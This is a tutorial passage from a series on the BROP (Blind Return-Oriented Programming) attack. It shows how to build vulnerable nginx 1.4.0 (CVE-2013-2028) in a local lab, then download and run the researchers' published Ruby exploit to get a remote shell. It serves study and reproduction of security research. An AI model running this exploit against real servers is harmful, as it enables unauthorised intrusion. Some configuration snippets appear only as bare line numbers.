This topic consists of 3 sessions:
- BROP Principle - dump memory to attacker and do exploit
- BROP Practice1 - attack conduct
- BROP Practice2 - code analysis
Following the 1st session, which talked about the principle of BROP attack, this page will discuss about how to conduct the real exploit in a Linux system.
This session is more like a kind of tutorial about how I conduct one of the 3 attacks conducted by the authors (specifically, attack nginx 1.4.0 with a buffer overflow bug - CVE-2013-2028, and finally can execute the shell) in my PC.
Setting Up Nginx-1.4.0
At first, we need to setup the server environment: nginx 1.4.0.
Download the nginx 1.4.0 source code:
$ wget nginx.org/download/nginx-1.4.0.tar.gz $ tar zxvf nginx-1.4.0.tar.gz $ cd nginx-1.4.0 $ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
Before compiling, modify the makefile with stack canary protection:
$ vi obj/Makefile
1 2 3
Then compile it:
$ make -j4 $ sudo make install
At this point, it is installed in the
/usr/local/nginx folder. If you use
checksec.sh to check it:
$ wget www.trapkit.de/tools/checksec.sh $ chmod +x ./checksec.sh $ ./checksec.sh --file /usr/local/nginx/nginx
You will get following result:
Which means it already has NX and Stack canary protection.
Before running nginx, we need to modify its configuration to make it run with 4 worker processes:
$ vi /usr/local/nginx/nginx.conf
1 2 3
Then we just run it with:
$ sudo /usr/local/nginx/nginx
Exploit BROP Attack
Now let’s see how to do the BROP attack. It is quite simple, since the authors have already write a nginx specific attack script using ruby.
Download the exploit script:
$ wget www.scs.standford.edu/brop/nginx-1.4.0-exp.tgz $ tar zxvf nginx-1.4.0-exp.tgz $ cd nginx-1.4.0-exp
And run it by simply executing:
$ ./brop.rb 127.0.0.1
If everything is ok, then it will exploit the nginx-1.4.0 using the approach I talked about here, and finally print the id of the exploited shell’s owner:
If there’s any problem, and you want to rerun the script, you should first remove the
state.bin file, or even restart nginx, and run brop.rb again:
$ rm -f ./state.bin $ ./brop.rb 127.0.0.1
In the following session, I will try to analyse the ruby script, and show how they do the attack in code aspect.